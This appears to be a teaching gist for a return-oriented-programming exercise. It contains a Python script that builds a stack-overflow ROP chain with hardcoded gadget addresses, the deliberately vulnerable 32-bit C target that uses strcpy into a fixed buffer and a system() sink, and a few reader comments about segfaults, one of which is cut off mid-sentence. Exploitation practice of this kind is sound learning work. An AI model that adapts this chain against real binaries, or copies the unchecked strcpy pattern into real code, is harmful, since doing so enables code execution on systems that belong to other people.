Simple ROP Exploit Example (x86)
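# NOTE: Written for Python 2.7; the payload is built from bytes literals, so it
# also runs unchanged on Python 3.
"""ROP chain for the ./simple-rop target (32-bit x86, non-PIE, no stack protector).

Chain: vuln()'s strcpy() overflow -> food(0xdeadbeef)
       -> feeling_sick(0xd15ea5e, 0x0badf00d) -> lazy(), which calls system()
       on the global buffer the two helpers filled in.

All addresses below were read from `objdump -d` of one particular build.
They are only valid for that binary: recompiling the target (or building it
PIE) changes every one of them and the chain segfaults.
"""
import os
import struct
import subprocess

# --- Gadgets / return targets (objdump -d simple-rop) ---
pop_ret = 0x08049ca5       # pop; ret  -- discards food()'s single argument after it returns
pop_pop_ret = 0x08049ca4   # pop; pop; ret -- discards feeling_sick()'s two arguments
lazy = 0x08049b05          # objdump -d | grep lazy
food = 0x08049b30          # objdump -d | grep food
feeling_sick = 0x08049b92  # objdump -d | grep feeling_sick

# Bytes from the start of vuln()'s buffer[100] to the saved frame pointer, as
# compiled (100 bytes of buffer plus 8 bytes of padding -> 0x6c). The saved
# return address sits 4 bytes after that.
RET_OFFSET = 0x6c


def p32(value):
    """Pack a 32-bit value little-endian.

    The explicit '<' keeps host byte order and native int size out of the
    picture; plain "I" happens to work on x86 but is not guaranteed to.
    """
    return struct.pack("<I", value)


def build_payload(ret_offset=RET_OFFSET):
    """Return the argv[1] bytes that overflow vuln() and run the ROP chain.

    Stack layout after the filler:
        [saved EBP][food][pop_ret][0xdeadbeef]
        [feeling_sick][pop_pop_ret][0xd15ea5e][0x0badf00d][lazy]
    Each function is entered by a `ret`, not a `call`, so the word after its
    address is what it sees as its own return address and the words after
    that are its arguments; returning into a pop gadget throws those
    arguments away so the next address in the chain lines up.

    Args:
        ret_offset: filler length up to the saved frame pointer (default 0x6c).

    Raises:
        ValueError: if the chain contains a NUL byte. argv entries are C
            strings, so strcpy() would stop there and truncate the chain.
    """
    parts = [
        b"A" * ret_offset,   # filler up to the saved frame pointer
        b"BBBB",             # overwrites the saved EBP
        # food(0xdeadbeef): food's own `ret` lands in pop_ret, which pops the
        # fake argument before returning into the next address.
        p32(food), p32(pop_ret), p32(0xdeadbeef),
        # feeling_sick(0xd15ea5e, 0x0badf00d): same trick with pop; pop; ret.
        p32(feeling_sick), p32(pop_pop_ret), p32(0xd15ea5e), p32(0x0badf00d),
        # lazy(): system() on the string the two calls above assembled.
        p32(lazy),
    ]
    payload = b"".join(parts)
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; strcpy() would truncate it")
    return payload


if __name__ == "__main__":
    # Hand the payload over as a real argv element rather than interpolating
    # raw bytes into a shell command line: no quoting or metacharacter
    # surprises, and the bytes reach argv[1] exactly as built.
    subprocess.call([b"./simple-rop", build_payload()])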
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
// Global command buffer: food() and feeling_sick() strcat() fragments into it
// and lazy() hands it to system(). main() resets it to "" on every run.
char string[100];
// I might need this later. ¯\_(ツ)_/¯
// I'm not using it so it shouldn't affect anything.
// Never called by this program, but it is linked in, so a corrupted return
// address can land here. This is the sink of the exercise: whatever the
// global `string` holds is run through the shell.
void lazy() {
    system(string);
}
// Appends "/bin" to the global `string` when called with the magic value.
// In the exploit it is entered by a `ret`, so the caller has to place
// 0xdeadbeef where a real call would have pushed the first argument.
// 0xdeadbeef does not fit in a signed int, so the literal is unsigned and
// `magic` is converted to unsigned for the comparison; the 32-bit word
// 0xdeadbeef therefore compares equal as intended.
void food(int magic) {
    printf("THANK YOU!\n");
    if (magic == 0xdeadbeef) {
        strcat(string, "/bin"); // unchecked append; fits in string[100] only if each helper runs once
    }
}
// Appends the echo command to the global `string` when both magic values
// match. Both arguments are read from the stack above the (fake) return
// address, which is why the exploit follows this call with a pop;pop;ret.
void feeling_sick(int magic1, int magic2) {
    printf("1m f33ling s1cK...\n");
    if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) {
        // 61 bytes; together with "/bin" and the NUL this is ~66 of the 100
        // available, so a single pass of the chain does not overflow `string`.
        strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'");
    }
}
// The deliberate bug. The parameter shadows the global `string`; argv[1]
// is copied into a 100-byte stack buffer with no length check, so a longer
// argument overwrites the saved EBP and return address (0x6c bytes to the
// saved EBP in the build the exploit targets). `= {0}` only zero-fills the
// buffer; it does nothing to stop the overflow.
void vuln(char *string) {
    char buffer[100] = {0};
    strcpy(buffer, string); // I don't know any better.
}
// Entry point: empties the global command buffer and feeds argv[1] --
// attacker-controlled -- straight into vuln().
int main(int argc, char** argv) {
    string[0] = 0; // start each run with an empty command
    printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n");
    if (argc > 1) {
        vuln(argv[1]);
    } else {
        printf("y0u f0rG0T t0 f33d mE!!!\n");
    }
    return 0;
}
You'll probably have to change the hardcoded addresses of the gadgets. |
Should I just set pop_ret to the start of the overflow? Like the first appearance of "BBBB", or after it?
You should set |
It created a segmentation fault. What do I have to change?